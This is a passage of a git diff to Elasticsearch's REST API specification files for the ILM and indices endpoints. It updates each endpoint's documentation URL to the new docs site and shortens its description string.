a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.explain_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.explain_lifecycle.json @@ -1,8 +1,8 @@ { "ilm.explain_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-explain-lifecycle.html", - "description": "Retrieves information about the index's current lifecycle state, such as the currently executing phase, action, and step." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-explain-lifecycle", + "description": "Explain the lifecycle state" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_lifecycle.json index 5abdfac7f5b30..722822fb30c2b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_lifecycle.json @@ -1,8 +1,8 @@ { "ilm.get_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-get-lifecycle.html", - "description": "Returns the specified policy definition. Includes the policy version and last modified date." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-get-lifecycle", + "description": "Get lifecycle policies" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_status.json index eba1b93c1e4b0..ccfb4e53b7837 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.get_status.json @@ -1,8 +1,8 @@ { "ilm.get_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-get-status.html", - "description":"Retrieves the current index lifecycle management (ILM) status." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-get-status", + "description":"Get the ILM status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.migrate_to_data_tiers.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.migrate_to_data_tiers.json index 78bcb182ec74f..d51ec58ed35b3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.migrate_to_data_tiers.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.migrate_to_data_tiers.json @@ -1,8 +1,8 @@ { "ilm.migrate_to_data_tiers":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-migrate-to-data-tiers.html", - "description": "Migrates the indices and ILM policies away from custom node attribute allocation routing to data tiers routing" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-migrate-to-data-tiers", + "description": "Migrate to data tiers routing" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.move_to_step.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.move_to_step.json index 3f46b8fa913b0..34485ff1de2e4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.move_to_step.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.move_to_step.json @@ -1,8 +1,8 @@ { "ilm.move_to_step":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-move-to-step.html", - "description":"Manually moves an index into the specified step and executes that step." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-move-to-step", + "description":"Move to a lifecycle step" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.put_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.put_lifecycle.json index b7fdbe04a0ffb..47c1f6c6d56f6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.put_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.put_lifecycle.json @@ -1,8 +1,8 @@ { "ilm.put_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-put-lifecycle.html", - "description":"Creates a lifecycle policy" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-put-lifecycle", + "description":"Create or update a lifecycle policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.remove_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.remove_policy.json index bc684186e15a4..020a9cfc05848 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.remove_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.remove_policy.json @@ -1,8 +1,8 @@ { "ilm.remove_policy":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-remove-policy.html", - "description":"Removes the assigned lifecycle policy and stops managing the specified index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-remove-policy", + "description":"Remove policies from an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.retry.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.retry.json index b567d9b73cb16..2097d90aae59f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.retry.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.retry.json @@ -1,8 +1,8 @@ { "ilm.retry":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-retry-policy.html", - "description":"Retries executing the policy for an index that is in the ERROR step." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-retry", + "description":"Retry a policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.start.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.start.json index 7141673ff9a9d..c2128e04179b4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.start.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.start.json @@ -1,8 +1,8 @@ { "ilm.start":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-start.html", - "description":"Start the index lifecycle management (ILM) plugin." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-start", + "description":"Start the ILM plugin" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.stop.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.stop.json index 962fa77263ee4..81bcb68ea8873 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.stop.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ilm.stop.json @@ -1,8 +1,8 @@ { "ilm.stop":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-stop.html", - "description":"Halts all lifecycle management operations and stops the index lifecycle management (ILM) plugin" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-stop", + "description":"Stop the ILM plugin" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/index.json b/rest-api-spec/src/main/resources/rest-api-spec/api/index.json index 79ecbd794024a..e36ebdaaeaad3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/index.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/index.json @@ -1,8 +1,8 @@ { "index":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-index_.html", - "description":"Creates or updates a document in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-create", + "description":"Create or update a document in an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.add_block.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.add_block.json index 24738d1f5bb27..8ef8460057347 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.add_block.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.add_block.json @@ -1,8 +1,8 @@ { "indices.add_block":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/index-modules-blocks.html", - "description":"Adds a block to an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-add-block", + "description":"Add an index block" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.analyze.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.analyze.json index a6d8cf6cfc987..a23fbb4521bef 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.analyze.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.analyze.json @@ -1,8 +1,8 @@ { "indices.analyze":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-analyze.html", - "description":"Performs the analysis process on a text and return the tokens breakdown of the text." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-analyze", + "description":"Get tokens from text analysis" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.cancel_migrate_reindex.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.cancel_migrate_reindex.json index 31cff458e357a..df3809405ef1e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.cancel_migrate_reindex.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.cancel_migrate_reindex.json @@ -1,8 +1,8 @@ { "indices.cancel_migrate_reindex":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-stream-reindex-cancel-api.html", - "description":"This API returns the status of a migration reindex attempt for a data stream or index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-cancel-migrate-reindex", + "description":"Cancel a migration reindex operation" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clear_cache.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clear_cache.json index 064a7573b3224..eb4f2cac70e34 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clear_cache.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clear_cache.json @@ -1,8 +1,8 @@ { "indices.clear_cache":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clearcache.html", - "description":"Clears all or specific caches for one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-clear-cache", + "description":"Clear the cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clone.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clone.json index 43a6383a1e75f..da6993c25f0c3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clone.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.clone.json @@ -1,8 +1,8 @@ { "indices.clone": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clone-index.html", - "description": "Clones an index" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-clone", + "description": "Clone an index" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.close.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.close.json index 0738216d1ee86..04f6e56d591ef 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.close.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.close.json @@ -1,8 +1,8 @@ { "indices.close":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-open-close.html", - "description":"Closes an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-close", + "description":"Close an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create.json index 3a3f279775fa8..dd70e98ecd5ce 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create.json @@ -1,8 +1,8 @@ { "indices.create":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-create-index.html", - "description":"Creates an index with optional settings and mappings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-create", + "description":"Create an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_data_stream.json index 3df9232c3a5c2..e1a9454ba143b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_data_stream.json @@ -1,8 +1,8 @@ { "indices.create_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Creates a data stream" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-create-data-stream", + "description":"Create a data stream" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_from.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_from.json index 435430b7a2673..24c30d76d3b5d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_from.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_from.json @@ -1,8 +1,8 @@ { "indices.create_from":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-create-index-from-source.html", - "description":"This API creates a destination from a source index. It copies the mappings and settings from the source index while allowing request settings and mappings to override the source values." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-create-from", + "description":"Create an index from a source index" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.data_streams_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.data_streams_stats.json index 90a3574d5b4bc..501e915713181 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.data_streams_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.data_streams_stats.json @@ -1,8 +1,8 @@ { "indices.data_streams_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Provides statistics on operations happening in a data stream." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-data-streams-stats-1", + "description":"Get data stream stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete.json index d066c745b94ac..8ccd387ba8a4c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete.json @@ -1,8 +1,8 @@ { "indices.delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-delete-index.html", - "description":"Deletes an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete", + "description":"Delete indices" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_alias.json index 7ec072a4582d9..10d2b3f08e8c2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_alias.json @@ -1,8 +1,8 @@ { "indices.delete_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html", - "description":"Deletes an alias." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-alias", + "description":"Delete an alias" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_lifecycle.json index 92b3ce61b4603..e0871e6cf3563 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_lifecycle.json @@ -1,8 +1,8 @@ { "indices.delete_data_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams-delete-lifecycle.html", - "description":"Deletes the data stream lifecycle of the selected data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-data-lifecycle", + "description":"Delete data stream lifecycles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream.json index dc9da50e0417b..a46fbc0b7f98f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream.json @@ -1,8 +1,8 @@ { "indices.delete_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Deletes a data stream." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-data-stream", + "description":"Delete data streams" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream_options.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream_options.json index 916ee0c5b59df..82393f819ed04 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream_options.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream_options.json @@ -1,8 +1,8 @@ { "indices.delete_data_stream_options":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html", - "description":"Deletes the data stream options of the selected data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-data-stream-options", + "description":"Delete data stream options" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_index_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_index_template.json index e920ec09351ec..29804904efc4c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_index_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_index_template.json @@ -1,8 +1,8 @@ { "indices.delete_index_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-delete-template.html", - "description":"Deletes an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-index-template", + "description":"Delete an index template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_template.json index b0471b9dafa7e..e35963382361b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_template.json @@ -1,8 +1,8 @@ { "indices.delete_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-delete-template-v1.html", - "description":"Deletes an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-template", + "description":"Delete a legacy index template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.disk_usage.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.disk_usage.json index 822d6ce9f84df..a2f7a3a216541 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.disk_usage.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.disk_usage.json @@ -1,8 +1,8 @@ { "indices.disk_usage": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-disk-usage.html", - "description": "Analyzes the disk usage of each field of an index or data stream" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-disk-usage", + "description": "Analyze the index disk usage" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.downsample.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.downsample.json index c67d566790ea6..bb7dc0bba5f7f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.downsample.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.downsample.json @@ -1,7 +1,7 @@ { "indices.downsample":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/xpack-rollup.html", + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-downsample", "description":"Downsample an index" }, "stability":"experimental", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists.json index b8e18348f489a..12bd81748b27b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists.json @@ -1,8 +1,8 @@ { "indices.exists":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-exists.html", - "description":"Returns information about whether a particular index exists." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-exists", + "description":"Check indices" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_alias.json index 7c855335efd00..ae3667770b60b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_alias.json @@ -1,8 +1,8 @@ { "indices.exists_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html", - "description":"Returns information about whether a particular alias exists." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-exists-alias", + "description":"Check aliases" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_index_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_index_template.json index 0163b0bbbd8ce..5c57e705d6194 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_index_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_index_template.json @@ -1,8 +1,8 @@ { "indices.exists_index_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/index-templates.html", - "description":"Returns information about whether a particular index template exists." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-exists-index-template", + "description":"Check index templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_template.json index a7f272af5b307..169c216c8db4e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_template.json @@ -1,8 +1,8 @@ { "indices.exists_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-template-exists-v1.html", - "description":"Returns information about whether a particular index template exists." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-exists-template", + "description":"Check existence of index templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.explain_data_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.explain_data_lifecycle.json index 14e07ee28a80d..595c7f917dc56 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.explain_data_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.explain_data_lifecycle.json @@ -1,8 +1,8 @@ { "indices.explain_data_lifecycle": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/data-streams-explain-lifecycle.html", - "description": "Retrieves information about the index's current data stream lifecycle, such as any potential encountered error, time since creation etc." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-explain-data-lifecycle", + "description": "Get the status for a data stream lifecycle" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.field_usage_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.field_usage_stats.json index efdbdfa4d422a..701f13e4555a0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.field_usage_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.field_usage_stats.json @@ -1,8 +1,8 @@ { "indices.field_usage_stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/field-usage-stats.html", - "description": "Returns the field usage stats for each field of an index" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-field-usage-stats", + "description": "Get field usage stats" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.flush.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.flush.json index f48f9ad1b1803..4a218bb7d3b11 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.flush.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.flush.json @@ -1,8 +1,8 @@ { "indices.flush":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-flush.html", - "description":"Performs the flush operation on one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-flush", + "description":"Flush data streams or indices" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.forcemerge.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.forcemerge.json index d6ef92551701e..1b0b90581cd6f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.forcemerge.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.forcemerge.json @@ -1,8 +1,8 @@ { "indices.forcemerge":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-forcemerge.html", - "description":"Performs the force merge operation on one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-forcemerge", + "description":"Force a merge" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get.json index e0cd96e346a7b..83e6c13ed4b95 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get.json @@ -1,8 +1,8 @@ { "indices.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-index.html", - "description":"Returns information about one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get", + "description":"Get index information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_alias.json index a360582a44a04..e0a59e6782b09 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_alias.json @@ -1,8 +1,8 @@ { "indices.get_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html", - "description":"Returns an alias." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-alias", + "description":"Get aliases" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle.json index a8d2e7185db83..5c46ab33c6411 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle.json @@ -1,8 +1,8 @@ { "indices.get_data_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams-get-lifecycle.html", - "description":"Returns the data stream lifecycle of the selected data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-lifecycle", + "description":"Get data stream lifecycles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle_stats.json index 8c9e947903402..d8d83f2b7d51b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle_stats.json @@ -1,8 +1,8 @@ { "indices.get_data_lifecycle_stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams-get-lifecycle-stats.html", - "description": "Get data stream lifecycle statistics." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-lifecycle-stats", + "description": "Get data stream lifecycle stats" }, "stability": "stable", "visibility": 